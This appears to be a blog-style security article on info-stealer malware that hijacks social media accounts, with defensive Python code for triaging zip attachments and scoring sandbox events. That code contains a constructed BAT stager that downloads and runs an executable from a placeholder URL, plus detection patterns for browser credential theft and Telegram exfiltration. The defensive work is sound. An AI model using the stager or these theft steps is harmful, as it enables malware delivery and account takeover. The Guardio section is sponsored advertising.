Tech

How Hackers Compromise Your Facebook and Instagram Accounts

June 25, 2024


Today, we're looking at how attackers take over Facebook and Instagram accounts with malware: how the attack unfolds, how your data is collected and sent out, and how a couple of clicks can hand over every account you are logged in to.

The Initial Attack

It usually starts with a seemingly innocuous message that carries an attachment. The attachment itself is the first red flag, especially when it is a zip archive: the contents are compressed, and if the archive is password-protected, mail and messaging scanners cannot inspect what is inside at all. The archive typically holds a small script, such as a BAT or PowerShell file. The script contains little malicious code of its own; it works as a stager that downloads the real malware from a trusted-looking host such as GitHub or GitLab and runs it.
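The checks a defender can run on such an archive before anyone opens it, as an added example (this is not code from the article): it reads the zip central directory, flags encrypted members (the ones scanners cannot see into), flags executable script members and double extensions, and, for each script, looks for download commands or references to the code-hosting sites the article names. The sample archive is constructed in memory to resemble the lure; its file names, the "example-org" URL and the error message are placeholders.

```python
"""Triage a zip attachment for stager indicators. Added example, not the
article's code; the sample archive and all names in it are made up."""
import io
import re
import zipfile

# Script types that execute when double-clicked on Windows.
SCRIPT_EXTS = {".bat", ".cmd", ".ps1", ".vbs", ".js", ".wsf", ".hta"}
# Code-hosting sites the article names as payload staging locations.
DOWNLOAD_HOSTS = ("github.com", "githubusercontent.com", "gitlab.com")
DOWNLOAD_CMDS = re.compile(
    r"\b(curl|wget|certutil|bitsadmin|Invoke-WebRequest|iwr|DownloadString|"
    r"DownloadFile|Start-BitsTransfer)\b",
    re.IGNORECASE,
)
URL_HOST = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)


def _ext(name: str) -> str:
    return ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""


def triage_zip(data: bytes) -> dict:
    """Return red flags found in a zip given as raw bytes."""
    findings = {"encrypted_entries": [], "disguised_names": [],
                "script_members": [], "stagers": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # General-purpose bit 0 set means the member is password-protected:
            # its content cannot be read (or scanned) without the password.
            if info.flag_bits & 0x1:
                findings["encrypted_entries"].append(info.filename)
                continue
            name = info.filename
            if _ext(name) not in SCRIPT_EXTS:
                continue
            findings["script_members"].append(name)
            if name.count(".") > 1:            # e.g. invoice.pdf.bat
                findings["disguised_names"].append(name)
            text = zf.read(info).decode("utf-8", errors="replace")
            hosts = sorted({m.group(1).lower() for m in URL_HOST.finditer(text)})
            reaches_host = any(h == d or h.endswith("." + d)
                               for h in hosts for d in DOWNLOAD_HOSTS)
            if DOWNLOAD_CMDS.search(text) or reaches_host:
                findings["stagers"].append(
                    {"file": name, "size": info.file_size, "hosts": hosts})
    findings["verdict"] = ("suspicious"
                           if findings["encrypted_entries"] or findings["stagers"]
                           else "no stager indicators")
    return findings


def build_attachment(members: dict) -> bytes:
    """Build an in-memory zip from {name: text} (helper for constructed samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, text in members.items():
            zf.writestr(name, text)
    return buf.getvalue()


def build_sample_attachment() -> bytes:
    """Constructed lure: a tiny .bat stager (placeholder URL) plus a decoy note."""
    stager = (
        "@echo off\r\n"
        "curl -s -o %TEMP%\\svc.exe "
        "https://raw.githubusercontent.com/example-org/example-repo/main/svc.exe\r\n"
        "start \"\" %TEMP%\\svc.exe\r\n"
        "echo Error: the file is corrupted\r\n"   # what the victim actually sees
        "del \"%~f0\"\r\n"                         # script removes itself
    )
    return build_attachment({"invoice.pdf.bat": stager,
                             "readme.txt": "Please review the attached invoice."})


if __name__ == "__main__":
    print(triage_zip(build_sample_attachment()))
```

If any member is encrypted the verdict is already "suspicious", because the one thing you cannot do with a password-protected archive is scan it; that is the whole reason attackers use them.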

Execution and Data Theft

Despite its small size (431 bytes in the sample discussed here), the script does its work in seconds once executed. To the victim it appears to do nothing beyond flashing an error message and closing. In the background, the payload it fetched harvests everything the browsers on the machine have saved, including the public IP address, cookies and session tokens (which let the attacker log in as you without needing the password), and stored passwords, and sends the bundle to an attacker-controlled Telegram chat.

Understanding the Threat

You might assume that only highly skilled attackers can build malware like this. Malware-as-a-service has removed that barrier: a novice can buy a ready-made stealer on a dark-web marketplace, point a one-line script at it, and start collecting credentials.

Dynamic Analysis of Malware

Running these scripts in a sandbox such as Triage shows how they operate: they make network requests, fingerprint the machine, delete themselves, drop files into startup locations, launch executables, and read profile data from the installed web browsers. Each step is carried out by a legitimate, signed system tool (cmd.exe, curl, PowerShell), so no single binary that runs is itself malicious and signature-based defenses have little to match on. Detection has to key on the behavior of the whole chain rather than on any one file.
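What keying on the chain looks like in practice, as an added example that is neither the article's code nor any sandbox vendor's: a small rule set run over sandbox-style events (process creation, file access, registry writes, DNS queries) that scores the behaviors listed above together with the Telegram/Discord exfiltration step the flowchart below describes. The events are constructed to resemble a Sysmon-style report of the described chain; the user name, paths, "example-org" URL and the chrome.exe noise events are placeholders, and the rules are illustrative rather than a tuned production ruleset.

```python
"""Behavioral scoring of a stager/stealer chain. Added example; events and
rules are constructed for illustration, not taken from a real report."""
import re
from collections import defaultdict
from dataclasses import dataclass

BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe")
CRED_STORES = ("login data", "web data", "cookies", "local state",
               "logins.json", "key4.db")
CODE_HOSTS = re.compile(r"(github\.com|githubusercontent\.com|gitlab\.com)", re.I)
BOT_EXFIL = re.compile(r"(api\.telegram\.org|discord(app)?\.com)", re.I)


@dataclass
class Event:
    kind: str            # "process", "file", "registry" or "dns"
    image: str           # image path of the acting process
    parent: str = ""     # parent image (process events)
    cmdline: str = ""    # command line (process events)
    action: str = ""     # file: create/read/delete; registry: set
    target: str = ""     # file path, registry value path or queried hostname


def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_browser(e: Event) -> bool:
    return _base(e.image) in BROWSERS


# Each rule is one behavior from the sandbox report; none is damning alone.
def r_lolbin_download(e):
    return (e.kind == "process"
            and _base(e.image) in ("curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe")
            and "http" in e.cmdline.lower() and CODE_HOSTS.search(e.cmdline) is not None)

def r_hidden_powershell(e):
    return (e.kind == "process" and _base(e.image) == "powershell.exe"
            and re.search(r"-(w(indowstyle)?\s+hidden|e(xecutionpolicy|p)\s+bypass|e(nc|ncodedcommand)\s)",
                          e.cmdline, re.I) is not None)

def r_temp_exe_exec(e):
    img = e.image.lower()
    return e.kind == "process" and "\\appdata\\local\\temp\\" in img and img.endswith(".exe")

def r_script_self_delete(e):
    return (e.kind == "file" and e.action == "delete"
            and _base(e.image) in ("cmd.exe", "powershell.exe")
            and e.target.lower().endswith((".bat", ".cmd", ".ps1")))

def r_run_key_persistence(e):
    t = e.target.lower()
    return ((e.kind == "registry" and "\\currentversion\\run" in t)
            or (e.kind == "file" and e.action == "create"
                and "\\start menu\\programs\\startup\\" in t))

def r_browser_store_access(e):
    # The browser reading its own stores is normal; anything else is not.
    return (e.kind == "file" and e.action == "read" and not _is_browser(e)
            and _base(e.target) in CRED_STORES)

def r_bot_api_exfil(e):
    return (not _is_browser(e)
            and bool((e.kind == "dns" and BOT_EXFIL.search(e.target))
                     or (e.kind == "process" and BOT_EXFIL.search(e.cmdline))))


RULES = {f.__name__[2:]: f for f in (
    r_lolbin_download, r_hidden_powershell, r_temp_exe_exec, r_script_self_delete,
    r_run_key_persistence, r_browser_store_access, r_bot_api_exfil)}


def analyze(events) -> dict:
    """Return per-rule hits and a verdict for a list of Events."""
    hits = defaultdict(list)
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits[name].append(e)
    if "browser_store_access" in hits and "bot_api_exfil" in hits:
        verdict = "info-stealer"          # collection plus exfiltration
    elif len(hits) >= 2:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"hits": dict(hits), "verdict": verdict}


# Constructed sample: the chain described in the article, plus browser noise.
TEMP = r"C:\Users\alice\AppData\Local\Temp"
CHROME = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default"
CHROME_EXE = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\cmd.exe", parent=r"C:\Windows\explorer.exe",
          cmdline=r'cmd.exe /c "C:\Users\alice\Downloads\invoice.pdf.bat"'),
    Event("process", r"C:\Windows\System32\curl.exe", parent=r"C:\Windows\System32\cmd.exe",
          cmdline=f"curl -s -o {TEMP}\\svc.exe "
                  "https://raw.githubusercontent.com/example-org/example-repo/main/svc.exe"),
    Event("process", f"{TEMP}\\svc.exe", parent=r"C:\Windows\System32\cmd.exe", cmdline=f"{TEMP}\\svc.exe"),
    Event("file", r"C:\Windows\System32\cmd.exe", action="delete",
          target=r"C:\Users\alice\Downloads\invoice.pdf.bat"),
    Event("registry", f"{TEMP}\\svc.exe", action="set",
          target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svc"),
    Event("file", f"{TEMP}\\svc.exe", action="read", target=f"{CHROME}\\Login Data"),
    Event("file", f"{TEMP}\\svc.exe", action="read", target=f"{CHROME}\\Network\\Cookies"),
    Event("dns", f"{TEMP}\\svc.exe", target="api.telegram.org"),
    Event("file", CHROME_EXE, action="read", target=f"{CHROME}\\Login Data"),   # normal
    Event("dns", CHROME_EXE, target="api.telegram.org"),                         # user on web Telegram
]

if __name__ == "__main__":
    for name, evs in analyze(SAMPLE_EVENTS)["hits"].items():
        print(f"{name}: {len(evs)} event(s)")
    print("verdict:", analyze(SAMPLE_EVENTS)["verdict"])
```

The point of the "info-stealer" verdict requiring both a credential-store read and a bot-API contact is that each on its own has benign explanations (backup tools read browser profiles; people use Telegram), while the pair from the same non-browser process in one session almost never does.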

Bots and Social Media

Bots are prevalent on social media platforms like Facebook and Twitter. Some spread misinformation, but many belong to attacker-run botnets that target business accounts by sending messages carrying info-stealer attachments. Even businesses with dedicated social media managers fall victim, as happened with Linus Tech Tips.

Attack Flowchart

  1. Attackers send messages containing malware links or attachments via Facebook Messenger.
  2. Recipients who open and run the attachment fetch the payload from platforms like GitHub or GitLab.
  3. The Python-based stealer runs and sends the harvested credentials and cookies to the attacker over Telegram or Discord.
  4. Roughly one in seventy recipients is compromised, which at the scale a botnet operates makes the campaign profitable.

Guarding Against Attacks

Guardio, our sponsor, is a browser extension that protects against online threats, including info stealers. It runs inside the browser to block scams and phishing links, monitors your accounts for data breaches, and offers account protection for platforms such as Facebook, Instagram, LinkedIn, and X, which helps stop info stealers from hijacking those accounts. Whatever tooling you use, remember that stolen session cookies let an attacker bypass both the password and multi-factor prompts, so if you suspect a stealer ran, log out of every active session on each affected service to invalidate those tokens before changing the passwords.

Conclusion

Sharing this information is crucial, especially with people who are not tech-savvy. Understanding how these attacks work, and refusing to run attachments that arrive in messages, prevents losses that are very hard to undo. If you found this useful, please share it. Stay informed, stay secure.
